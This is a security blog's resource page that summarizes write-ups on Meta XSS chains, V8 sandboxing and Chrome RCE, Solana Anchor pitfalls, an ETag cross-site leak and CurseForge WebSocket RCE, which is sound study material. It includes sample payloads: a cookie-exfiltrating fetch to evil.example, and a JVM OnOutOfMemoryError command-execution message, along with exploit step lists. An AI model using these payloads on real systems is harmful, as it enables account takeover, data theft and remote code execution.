Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Multiple XSS in Meta Conversion API Gateway Leading to Zero-Click Account Takeover - 1863

ysamm    Reference → Posted 2 Months Ago
  • The Meta Conversions API Gateway is a server-side mechanism for businesses to send web events, bypassing browser-based tracking like the Facebook Pixel. Even if a user has cookies disabled, an ad blocker on, or other browser restrictions, this method still works.
  • The gateway at gw.conversionsapigateway.com is Meta's own deployment of the application. The fbq JavaScript module loads the collection/processing module from a JavaScript file named capig-events.js. Any vulnerability in this script inherits the privileges of the site it runs on, such as business.facebook.com.
  • capig-events.js registers a message handler that only fires when the page has an opener window. The message includes various pieces of data, such as a type. If the type is IWL_BOOTSTRAP, the script checks whether the pixel_id exists in its list. The event origin is never explicitly verified, meaning the message can come from any origin.
  • After some processing, event.origin is used to dynamically load JavaScript via <origin>/sdk/<pixel_id>/iwl.js. Since an attacker controls the origin, they control which JavaScript gets loaded, creating the opportunity for some nasty XSS. This is a classic case of using data from a postMessage call without validating its origin.
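A minimal sketch of the bug class, with illustrative names (not Meta's actual code): the handler validates the message type and pixel_id, but derives the script URL from an unchecked event.origin.

```typescript
// Sketch of the vulnerable pattern; scriptUrlFor and knownPixelIds are
// hypothetical stand-ins, not the real capig-events.js internals.
type BootstrapMessage = { origin: string; data: { type: string; pixelId: string } };

const knownPixelIds = new Set(["123456"]);

// Vulnerable: returns the URL that would be dynamically loaded as JavaScript.
// Nothing ever checks that `origin` is a trusted host.
function scriptUrlFor(msg: BootstrapMessage): string | null {
  if (msg.data.type !== "IWL_BOOTSTRAP") return null;
  if (!knownPixelIds.has(msg.data.pixelId)) return null;
  return `${msg.origin}/sdk/${msg.data.pixelId}/iwl.js`; // attacker-controlled origin
}

// The fix is a plain allowlist check before anything else:
const trustedOrigins = new Set(["https://gw.conversionsapigateway.com"]);
function safeScriptUrlFor(msg: BootstrapMessage): string | null {
  if (!trustedOrigins.has(msg.origin)) return null;
  return scriptUrlFor(msg);
}

const evil: BootstrapMessage = {
  origin: "https://evil.example",
  data: { type: "IWL_BOOTSTRAP", pixelId: "123456" },
};
```

With `evil`, the vulnerable path happily returns a script URL on the attacker's origin, which would then execute in the victim page's context; the allowlisted variant rejects it.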
  • This isn't immediately exploitable because a CSP and Cross-Origin-Opener-Policy (COOP) are enabled. The CSP is set up to disallow arbitrary external scripts, and most pages include a COOP of same-origin-allow-popups. On the surface, this appears to prevent the issue. However, security is not evaluated on a single page or a single policy; it is evaluated across all contexts where the code runs.
  • For a CSP bypass, some major pages allow third-party analytics providers on the page. This expands the attack surface to where an XSS or subdomain takeover on one of those providers would do the job. For the COOP bypass, an attacker can regain access to an opener by reusing a window.name. They found a vulnerability in a third-party application that let them hijack an iframe on a CSP-allowed site and interact with the page. Here's the full exploit chain:
    1. Load URL inside of Facebook application.
    2. Perform the opener bypass to a less strict CSP location.
    3. Hijack the iframe of the third-party site. This sends a postMessage to the parent window to trigger the exploit.
    4. Host an attacker-controlled JavaScript file on the third-party host with the malicious JavaScript. Script is executed in the context of www.meta.com.
    5. They escalated this to a full account takeover on Facebook by abusing CORS permissions.
  • After reporting the previous vulnerability, they decided to review how the Conversions API actually worked. When loaded on Meta, it displayed a graphical tool to the user. After experimenting with some of the rules for events and parameters, they noticed a POST request for adding a rule. Upon reviewing the source, they noticed that the rule information was used to dynamically generate JSON within the capig-events.js script.
  • The JSON keys are supplied in the request and are used to construct a JavaScript string without any escaping or validation. So, "]} could be used to inject attacker-controlled JavaScript into the generated output. In practice, this creates stored XSS within the capig-events.js file. Notably, the payload is served to every user, including on Meta-owned domains. This isn't just stored XSS; this is a supply chain attack.
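The bug class can be sketched like this (a hypothetical generator, not the real capig-events.js code): keys are dropped into a JavaScript source string with no escaping, so a key that closes the literal early smuggles in script.

```typescript
// Hypothetical rule-to-script generator with the unescaped-key flaw.
function generateRuleScript(ruleKeys: string[]): string {
  const quoted = ruleKeys.map((k) => `"${k}"`).join(", ");
  // Emits e.g.: var rules = {"keys": ["foo", "bar"]};
  return `var rules = {"keys": [${quoted}]};`;
}

// A key containing "]} closes the array and object, then appends attacker JS.
const evilKey = `x"]};fetch("https://evil.example/?c="+document.cookie);//`;
const generated = generateRuleScript([evilKey]);
// `generated` is now a script that exfiltrates cookies for every user the
// shared file is served to — stored XSS with supply-chain reach.
```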
  • The author of the post got paid $62K for the first bug and $250K for the second bug. Absolutely insane! I really appreciate the author's intricate knowledge of Meta applications. On the first bug, the CSP and COOP issues would have been easy to move on from, since they couldn't be exploited immediately. Instead, they either A) had the gadgets ready to go for this or B) knew where to find them. This knowledge has served this security researcher very well!

The V8 (Heap) Sandbox - 1862

v8    Reference → Posted 2 Months Ago
  • v8 is a JavaScript engine that compiles JavaScript code into native machine code to make execution faster. The v8 Sandbox, a lightweight sandbox, is now a stable feature in Chrome. Why is this sandbox needed? Chrome is a huge target with a difficult history of memory corruption issues; these aren't classic memory corruption issues like UAFs and OOB reads, though. They are very subtle logic issues that make languages like Rust or new features like memory tagging unhelpful.
  • The author includes an example that could likely lead to memory corruption from side effects. It's possible this could be solved by a good compiler check, like in Rust, but that misses a fundamental issue with v8: v8 itself is a compiler! Memory safety cannot be guaranteed if the compiler is part of the attack surface.
  • Why doesn't memory tagging work, though? A CPU side channel, which can easily be exploited from JavaScript because it's arbitrary code, can be used to leak the tag values. Hence, the attacker can bypass the mitigation. Additionally, due to pointer compression, there is no room in the bits for v8 to store tags.
  • The solution to this is using a sandbox to isolate the V8 heap's memory such that memory corruption cannot spread to other parts of the process memory. This is similar to userspace and kernel space in operating systems. The idea is that a bug in v8 shouldn't affect the rest of the hosting process.
  • In practice, the sandbox replaces all data types that can access out-of-sandbox memory with sandbox-compatible alternatives. In particular, pointers and 64-bit sizes must be removed because an attacker could corrupt them. Due to constraints, the V8 heap is the only thing within the sandbox. The post has a nice image that shows the design: v8 objects effectively hold entries into a table outside of the sandbox, and the table entry then points to the external object. If you can only control the table index, there is not much you can do to exploit this.
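As an analogy (my sketch, not V8's actual data structures), the indirection works like this:

```typescript
// Out-of-sandbox objects are reachable only through a table that lives
// outside the sandbox; in-sandbox objects store an index, never a pointer.
class ExternalPointerTable {
  private entries: object[] = [];

  register(external: object): number {
    this.entries.push(external);
    return this.entries.length - 1; // the handle stored inside the sandbox
  }

  resolve(handle: number): object {
    // An attacker who corrupts a handle can only select another live entry
    // or fail this bounds check — never forge an arbitrary pointer.
    if (!Number.isInteger(handle) || handle < 0 || handle >= this.entries.length) {
      throw new RangeError("invalid external pointer handle");
    }
    return this.entries[handle];
  }
}

const table = new ExternalPointerTable();
const handle = table.register({ kind: "external resource" });
```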
  • This isn't perfect, though. There are several invariants that in-sandbox corruption can still break. For instance, they show code that assumes the number of properties stored in a JSObject is less than the total number of properties on the object. Theoretically, an attacker could corrupt one of these values to break the invariant, leading to an out-of-sandbox access.
  • According to the author, this is okay, though. First, many of these are simply memory corruption issues that can be fixed via simple bounds checks or UAF checks. These sandbox bugs are also mitigated by many other security features, such as Chrome's libc++ hardening.
  • To be a real security boundary, it must be testable and built with a specific attacker model in mind. The attacker model assumes read/write access inside the v8 sandbox, with the goal of corrupting memory outside of it. To make this testable, debug builds include a memory-corruption API that can be used to read/write within the sandbox. Finally, they have a sandbox testing mode that determines whether a write violates the invariants.
  • A fantastic post on the v8 sandbox and the more in-depth v8 heap sandbox. I appreciated the well-defined threat model around the protection the most.

From object transition to RCE in the Chrome renderer - 1861

Man Yue Mo - GitHub    Reference → Posted 2 Months Ago
  • In JavaScript engines, there's a map (known as a hidden class) that represents the memory layout of an object. A map holds an array of property descriptors that contain information about each property, as well as the elements and their types. These maps are shared between objects that have the same layout. If a matching map doesn't exist, a new one is created. When this happens, the old and new maps are related by a transition that goes from one map to the other.
  • When doing this transition, the old map and new map hold pointers to each other. A map can have multiple transitions. For instance, if property b is added and then property c is added, this creates two transition objects. If a field type is changed, such as going from an integer to a double, the map of the object is changed to reflect this via a transition.
  • In the post's example, with o1 and o2 both having a as an integer, if o1's a is set to a double then o2's map is marked deprecated. This is because the SMI (internal small integer) field type gets generalized to a more general representation. Eventually, the o2 object will be migrated to the map of o1 once one of its properties is accessed.
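Reconstructed as a runnable sketch (the maps themselves are V8-internal and invisible from script, so the comments describe what the engine does):

```typescript
// Sketch of the o1/o2 example; the map transitions happen inside V8.
const o1: { a: number } = { a: 1 }; // map M1: property `a` stored as an SMI
const o2: { a: number } = { a: 2 }; // same shape, so o2 shares map M1

o1.a = 1.5; // `a` generalizes SMI -> double: o1 transitions to a new map M2,
            // and the old map M1 is marked deprecated

const v = o2.a; // accessing a property migrates o2 off the deprecated M1 to M2
```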
  • In v8, object properties can be stored in an array or a dictionary. Objects with properties stored in an array are fast objects, while objects with properties in dictionaries are dictionary objects. Map transitions and deprecations are specific to fast objects. Normally, when a map deprecation occurs, another fast map is created, but it's possible to make this not happen. In particular, if there are too many transitions on a map, a new dictionary map is created instead.
  • Most uses of PrepareForDataProperty are safe, but there are two locations where the map can be updated to a dictionary map instead of the original object map. In CreateDataProperty, an update may result in a dictionary map. There are multiple routes to this, but the usage of the spread syntax ended up being the most interesting.
  • When using the spread syntax (...obj1) on an object with a property accessor, the function CreateDataProperty will be called while the object is being cloned. While this cloning is happening, it's possible to deprecate the map being used for the clone. This allows the updated map to be a fast map instead of a dictionary map! A type confusion in the JavaScript engine now leads to memory corruption.
  • To exploit this, they used the type confusion to overwrite the elements field within the underlying data structure for NameDictionary with a large value. By doing this, they get an OOB read of property values that leads to improper object access. Creating a "fake object" primitive is one of the best primitives in JavaScript engine exploitation. So, just arrange the heap in a nice way to create a fake object.
  • Once there, an arbitrary read/write is easy to gain. First, place an object into an array and use the OOB read to read the addresses of the objects stored within the array. For a write, do the same thing as a read but write to these objects instead.
  • Chrome recently implemented the V8 heap sandbox to isolate the V8 heap from other process memory, such as code, so that corruption within the V8 heap can't reach other memory. So, to get code execution, escaping this sandbox is a requirement. To work around it, they modified DOM objects implemented in Blink. These are objects allocated outside of the v8 heap but represented as API objects in v8. By causing a type confusion in the API calls, it's possible to obtain a read/write primitive over the entire memory space.
  • Overall, a good post on exploitation and how to bypass a new defense-in-depth measure. Great stuff! If I had to guess how this bug was found, the author found a side effect that was not accounted for in some paths.

Why Anchor Accounts Go Stale After CPI (and When to Reload) - 1860

Taichi Audits    Reference → Posted 2 Months Ago
  • When making a Cross Program Invocation (CPI) in Solana via invoke or invoke_signed, you provide a set of accounts to be used. In raw Solana, you pass in AccountInfo directly, which is a handle to the in-memory runtime state. In Anchor, you pass in Account<'info, T>, which is a deserialized version of T and acts as a cached value.
  • Native Solana programs do not operate on the ledger directly. Instead, accounts are loaded into the runtime as a working set. Instructions mutate this in-memory state. Many things, like lamports, are read directly from the runtime state every time. If you reborrow the data, then the underlying bytes will also be updated.
  • In Anchor, the T in Account<'info, T> is a deserialized snapshot of the account data bytes. At the start of the instruction, Anchor constructs the accounts by deserializing them in a generated handler from the info.data on the account. This means the data is copied onto the stack/heap as a Rust value and is NOT a live reference to the runtime bytes. At the end of the instruction, Anchor serializes the data structure and writes it back to the runtime.
  • In practice, this has a strange consequence: if a CPI modifies an account, the cached version will have stale data. For instance, for balance on a token account, a token transfer would show the same balance before and after the CPI, regardless of whether the account balance changed.
  • To solve this problem, Anchor accounts have reload(). This re-reads and deserializes the data within AccountInfo.data, so the account data is no longer stale.
  • The author gives some tips on when to call reload(). It's required when A) a CPI can be used to mutate account data, B) the account needs to be read/validated later and C) you are reading a cached struct. If lamports or native runtime fields are being read, then reloading isn't necessary.
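Anchor itself is Rust, but the caching behavior can be sketched with a TypeScript analogy (all names here are illustrative, not Anchor's API):

```typescript
// The runtime keeps the authoritative bytes; Anchor's Account<T> behaves
// like a snapshot deserialized once at instruction start.
type TokenAccountData = { amount: number };

class AccountHandle {
  constructor(private runtimeBytes: TokenAccountData) {}
  // What a CPI into the token program effectively does: mutate runtime state.
  cpiTransferOut(amount: number) { this.runtimeBytes.amount -= amount; }
  read(): TokenAccountData { return { ...this.runtimeBytes }; } // fresh deserialize
}

class AnchorAccount {
  private cache: TokenAccountData;
  constructor(private info: AccountHandle) { this.cache = info.read(); }
  get amount() { return this.cache.amount; }  // served from the snapshot
  reload() { this.cache = this.info.read(); } // re-read + re-deserialize
}

const info = new AccountHandle({ amount: 100 });
const acct = new AnchorAccount(info);
info.cpiTransferOut(40);   // the CPI changes the runtime state
const stale = acct.amount; // still 100 — the cached snapshot is stale
acct.reload();
const fresh = acct.amount; // 60 — cache refreshed from the runtime bytes
```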
  • Overall, a great post on Solana CPI reloading and why it must be done. I had always wondered why lamports didn't need to be reloaded but the data did; now I know!

Insecure by Design: Default Configurations in Embedded Systems - 1859

Kevin Chen    Reference → Posted 2 Months Ago
  • The OWASP IoT Top 10 includes Insecure Default Settings. To the author, this means a configuration that is insecure by default, a setting that the user must explicitly change, or a setting that is bad and unchangeable. They have several examples of this in the article.
  • The first target is the Kobo eReader, an alternative to the Amazon Kindle. Using a debug shell, the default credentials are admin:admin. So, with access to a device, it's possible to log in to it. Additionally, there is no firmware signature checking, so it's trivial to reflash the firmware with arbitrary code.
  • The next thing they looked at was a Bitcoin ATM kiosk. After clicking around for a while, they were able to access the Windows control panel. With access to the system as an administrator, it would have been possible to backdoor the entire thing. To demonstrate this, they used Mimikatz to extract creds and ran Doom on it.
  • A good post on some real-world issues. Insecure defaults have existed for years and will likely continue to do so. Good finds!

The economic failures of penetration testing - 1858

Zeyu    Reference → Posted 2 Months Ago
  • The failure of the penetration testing market is usually framed as a technical problem. This author argues that it's actually an economic incentives problem: the market rewards the appearance of security over the actual reduction of risk at the company. Because of this, "it is not a market for outcomes, it is a market for signals."
  • The author compares the market to used car sales. The seller knows more about the car's quality than the buyer, so the price averages out to an expected quality, driving the higher-quality sellers out of business. In pentesting, it's much the same: the buyer doesn't know where the quality stands, so they buy certifications and compliance rather than actual security. This leaves us at an equilibrium where an "acceptable" pentest is all that's delivered.
  • The next issue is around bad incentives. Security teams are evaluated on audit success rather than on security posture. This incentivizes them to commission work that passes compliance checks with minimal friction. If a pentest uncovers real issues, that's too much work to deal with and looks bad on them. Because of the friction of fixing issues, insecurity becomes a form of organizational equilibrium.
  • Compliance distorts the market by acting as a demand proxy for security. Pentests are bought not to find issues but to satisfy a checklist. Success is often defined by the existence of a report, not the absence of exploitation paths.
  • Flat fees and hourly rates in pentesting make this all a race to the bottom on price. This creates a market where firms reduce costs through checklists and junior staffing. Why is price what's competed on? Because the quality of a pentest is largely unobservable. The market prices not risk reduction but plausible deniability.
  • They have a few recommendations on how to fix this in the future, and it's all about aligning incentives. For pentesters, we should move away from one-off pentests toward long-term engagements with continuous outcomes. Right now, compliance is treated as security, which is bad; compliance is a lagging indicator of security. It should be the byproduct of a secure system, not the objective in itself.
  • In general, the market doesn't value high-signal work because it costs more money and creates unwanted work. They have a great quote at the end that sums everything up: "they mirror the broader economics of prevention: costs are immediate, benefits are invisible, and success is defined by the absence of events that cannot be proven to have been avoided."

Solana Forking - 1857

surfpool    Reference → Posted 2 Months Ago
  • Solana forking hasn't really existed until now. This is an amazing innovation for writing proofs of concept locally.

Ethereum Tools by Recon (Free) - 1856

Recon    Reference → Posted 2 Months Ago
  • There are many great free tools on this website: EVM bytecode analysis, storage slot preimages, an invariants sandbox... lots of good stuff!

Cross-Site ETag Length Leak - 1855

Takeshi Kaneko (arkark)    Reference → Posted 2 Months Ago
  • The author of this post found an unintended way to solve a CTF challenge by exploiting a new cross-site leaks (XS-Leaks) technique, so they turned it into a standalone challenge for this CTF. The challenge had a single solve.
  • The setup is a note-taking app where GET / returns the notes, filtered by a search query parameter, and a note can be created via POST /new, which is vulnerable to CSRF. One of the bot's notes contains the flag, and it's your job to steal it from another tab via JavaScript. The timeout is 60s, and there's no HTML injection, no sorting, no CSS, and no other loaded resources.
  • The ETag header is an HTTP response header that acts as a unique identifier for a specific version of a web resource; it's useful for caching data more effectively (see the MDN docs). The application sets the tag via jshttp/etag, which prefixes the tag with the content size in hex. The ETag length can therefore differ by 1 depending on the response size, and the response size is controlled thanks to the CSRF bug.
  • This is the beginning of the primitive. What can you do with this? If a response includes the ETag header, subsequent requests will use the same URL with the If-None-Match header containing the ETag. Many web servers have a maximum size for request headers and will output a 431 Request Header Fields Too Large error if exceeded.
  • By padding the URL so that the overall header size sits right at the threshold, the extra If-None-Match byte can be the difference between a 200 OK and a 431. Using the search, this can be abused to check whether the searched bytes match or not, cross-origin. But can you see this? Cross-origin status codes are opaque!
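The arithmetic behind the oracle looks roughly like this (the constants are illustrative: Node's actual limit is configured via --max-http-header-size, and jshttp/etag appends a 27-character base64 SHA-1 after the hex length prefix):

```typescript
// jshttp/etag prefixes the tag with the body length in hex, so the tag grows
// by one byte when the response size crosses a hex-digit boundary
// (e.g. "fff-<hash>" vs "1000-<hash>").
function etagLength(bodyBytes: number): number {
  return bodyBytes.toString(16).length + 1 /* "-" */ + 27 /* base64 hash */;
}

const MAX_HEADER_BYTES = 16384; // assumed server limit that triggers a 431

function requestSucceeds(urlPaddingBytes: number, bodyBytes: number): boolean {
  const fixedHeaders = 300;                       // illustrative baseline
  const ifNoneMatch = 18 + etagLength(bodyBytes); // "If-None-Match: " + tag
  return fixedHeaders + urlPaddingBytes + ifNoneMatch <= MAX_HEADER_BYTES;
}

// Pad the URL so the request sits exactly on the boundary: a one-byte
// difference in response size (search hit vs miss) then flips 200 into 431.
const padding = MAX_HEADER_BYTES - 300 - 18 - etagLength(0xfff);
```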
  • Chrome has a behaviour where the browser may or may not push an entry to the page history. If the same URL is accessed twice in a row but the second navigation fails, only one history event is added. If they both succeed, then two events are added. By looking at the number of entries in the page history, we can determine whether the navigation succeeded or failed.
  • Putting this all together, the exploit has a few steps:
    1. Use the CSRF creation of notes to fine-tune the number of bytes on a page to be on the boundary.
    2. Pad the URL of the second request to sit near Node's header-size threshold.
    3. Measure the history.length of the frame to see whether the second navigation occurred or not.
    4. Repeat character by character until the flag is leaked.
  • In the unintended solution of another challenge, they used the presence of an ETag header to cause the same issue.
  • Overall, a great post on a new XS-Leaks technique! These are always really complicated and really subtle, so I appreciated the new write-up for it.

When WebSockets Lead to RCE in CurseForge - 1854

Elliott.diy    Reference → Posted 2 Months Ago
  • The author of this post had recently found an RCE in a VPN client called SuperShy. After finding this bug, they were curious about other services that exposed WebSockets locally on their system. They noticed that CurseForge, a widely used video game modding platform, was doing this.
  • To actually find the WebSocket, they used something like Wireshark to see what was going on. Every time CurseForge was launched, they would see a payload for a typical launch message. Notably, it had AdditionalJavaArguments inside of it, along with a type and a Name that looked like Java function names.
  • WebSockets are not bound by the Same-Origin Policy (SOP) the way HTTP requests are; as long as the server accepts connections from any origin, they're allowed. The server performed no origin check, no authorization, nothing. So, they tried connecting to the WebSocket with a bogus Origin header, and it worked. This means the application can be accessed from any website the user visits. Neat!
  • There were several actions, but a single one stood out: minecraftTaskLaunchInstance. It contains a parameter for arbitrary additional Java arguments that are used to start the game. Another interesting one is createModpack, which creates a modpack on the user's system. This is required because we need a valid modpack to call minecraftTaskLaunchInstance with.
  • The author used a clever trick to trigger arbitrary code. First, they pass -XX:MaxMetaspaceSize=16m, which limits the JVM's metaspace until the JVM runs out of memory. When that happens, the JVM calls an out-of-memory handler, which can be anything. The second flag, -XX:OnOutOfMemoryError="cmd.exe /c calc", supplies that handler, which gets triggered on the crash.
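Putting the pieces into a sketch of the malicious launch message (the schema here is my guess from the write-up's field names, not CurseForge's documented API):

```typescript
// Hypothetical reconstruction of the launch message. The two JVM flags make
// the game crash on startup and run an arbitrary command from the handler.
const launchMessage = {
  type: "minecraftTaskLaunchInstance",
  payload: {
    AdditionalJavaArguments: [
      "-XX:MaxMetaspaceSize=16m",                 // starve the JVM's metaspace
      '-XX:OnOutOfMemoryError="cmd.exe /c calc"', // runs when the OOM fires
    ],
  },
};

// Sent over the unauthenticated local WebSocket, e.g.:
//   new WebSocket(`ws://localhost:${port}`).send(wire);
const wire = JSON.stringify(launchMessage);
```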
  • The CurseAgent doesn't bind its WebSocket server to a fixed port; it listens on a randomly assigned local port whenever the launcher starts. So they wrote a JavaScript scanner that scans 16K ports to find it.
  • Good write-up! To fix the bug, CurseForge no longer exposes the WebSocket server; I don't know what they use for this functionality instead.